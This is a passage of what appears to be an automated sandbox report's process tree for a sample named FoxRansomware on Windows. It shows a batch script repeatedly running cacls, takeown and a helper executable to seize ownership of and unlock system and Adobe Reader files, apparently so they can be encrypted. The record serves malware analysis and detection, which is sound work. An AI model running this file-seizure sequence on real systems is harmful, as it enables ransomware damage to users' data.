    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
    3⤵
    PID:3952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:3040
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:2264
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4264
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""
  2⤵
  PID:356
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4864
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"
    3⤵
    PID:640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3728
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4216
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2228
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""
  2⤵
  PID:4404
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C
    3⤵
    PID:1584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"
    3⤵
    PID:4616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "qmgr1.dat" -nobanner
    3⤵
    PID:4388
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "qmgr1.dat" -nobanner
      4⤵
      PID:4696
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4484
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png""
  2⤵
  PID:4444
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png" /E /G Admin:F /C
    3⤵
    PID:4788
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Purble Place\PurblePlaceMCE.png"
    3⤵
    PID:4524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "PurblePlaceMCE.png" -nobanner
    3⤵
    PID:4752
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "PurblePlaceMCE.png" -nobanner
      4⤵
      PID:4456
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4748
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png""
  2⤵
  PID:4656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png" /E /G Admin:F /C
    3⤵
    PID:4712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Solitaire\SolitaireMCE.png"
    3⤵
    PID:4852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "SolitaireMCE.png" -nobanner
    3⤵
    PID:4276
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "SolitaireMCE.png" -nobanner
      4⤵
      PID:4308
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""
  2⤵
  PID:4312
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png" /E /G Admin:F /C
    3⤵
    PID:812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png"
    3⤵
    - Modifies file permissions
    PID:4284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
    3⤵
    PID:4272
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "SpiderSolitaireMCE.png" -nobanner
      4⤵
      PID:4924
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4832
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""
  2⤵
  PID:4348
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"
    3⤵
    - Modifies file permissions
    PID:2540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4776
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4492
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4520
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""
  2⤵
  PID:4716
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"
    3⤵
    PID:4824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4328
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4428
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4488
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""
  2⤵
  PID:4496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C
    3⤵
    PID:4508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"
    3⤵
    PID:4988
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "overlay.png" -nobanner
    3⤵
    PID:5056
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "overlay.png" -nobanner
      4⤵
      PID:4512
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5100
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""
  2⤵
  PID:5060
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:5004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"
    3⤵
    - Modifies file permissions
    PID:4560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:5072
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4572
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3408
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""
  2⤵
  PID:3124
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C
    3⤵
    PID:5116
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"
    3⤵
    - Modifies file permissions
    PID:2876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "br.gif" -nobanner
    3⤵
    PID:3812
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "br.gif" -nobanner
      4⤵
      PID:3788
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""
  2⤵
  PID:3816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C
    3⤵
    PID:3548
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"
    3⤵
    - Modifies file permissions
    PID:5096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "form_responses.gif" -nobanner
    3⤵
    PID:4900
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "form_responses.gif" -nobanner
      4⤵
      PID:1396
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3444
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""
  2⤵
  PID:3796
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C
    3⤵
    PID:3852
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"
    3⤵
    PID:1780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "review_email.gif" -nobanner
    3⤵
    PID:3972
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "review_email.gif" -nobanner
      4⤵
      PID:1868
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""
  2⤵
  PID:1524
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C
    3⤵
    PID:4872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "tr.gif" -nobanner
    3⤵
    PID:2544
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "tr.gif" -nobanner
      4⤵
      PID:3724
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1448
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""
  2⤵
  PID:2532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"
    3⤵
    PID:1432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "AdobePiStd.otf" -nobanner
    3⤵
    PID:3560
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "AdobePiStd.otf" -nobanner
      4⤵
      PID:3400
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""
  2⤵
  PID:2416
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"
    3⤵
    PID:4012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
    3⤵
    PID:2784
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
      4⤵
      PID:2572
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3096
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""
  2⤵
  PID:3836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C
    3⤵
    PID:2740
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"
    3⤵
    PID:3108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
    3⤵
    PID:3192
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
      4⤵
      PID:3092
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:964
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""
  2⤵
  PID:1456
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"
    3⤵
    PID:2492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "can.fca" -nobanner
    3⤵
    PID:3640
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "can.fca" -nobanner
      4⤵
      PID:3280
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""
  2⤵
  PID:1956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C
    3⤵
    PID:2652
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"
    3⤵
    PID:2624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "usa03.ths" -nobanner
    3⤵
    PID:1624
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "usa03.ths" -nobanner
      4⤵
      PID:3580
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:352
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""
  2⤵
  PID:3564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C
    3⤵
    PID:3648
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"
    3⤵
    PID:3944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "GREEK.TXT" -nobanner
    3⤵
    PID:1720
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "GREEK.TXT" -nobanner
      4⤵
      PID:3668
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""
  2⤵
  PID:1212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C
    3⤵
    PID:704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"
    3⤵
    PID:3772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "CP1253.TXT" -nobanner
    3⤵
    PID:3260
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "CP1253.TXT" -nobanner
      4⤵
      PID:2236
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:2992
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:2100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    - Modifies file permissions
    PID:2508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "device.png" -nobanner
    3⤵
    PID:2200
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "device.png" -nobanner
      4⤵
      PID:2428
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""
  2⤵
  PID:2608
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2684
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"
    3⤵
    - Modifies file permissions
    PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2144
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3112
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1560
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""
  2⤵
  PID:2972
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:2256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"
    3⤵
    PID:2396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:2772
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:272
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3540
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\51d6YIvH.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""
  2⤵
  PID:1740
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C
    3⤵
    PID:4032
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"
    3⤵
    - Modifies file permissions
    PID:1608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 95Y5ZjHg.exe -accepteula "LogTransport2.exe" -nobanner
    3⤵
    PID:1848
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
      95Y5ZjHg.exe -accepteula "LogTransport2.exe" -nobanner
      4⤵
      PID:816
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\95Y5ZjHg.exe
    95Y5ZjHg.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3164
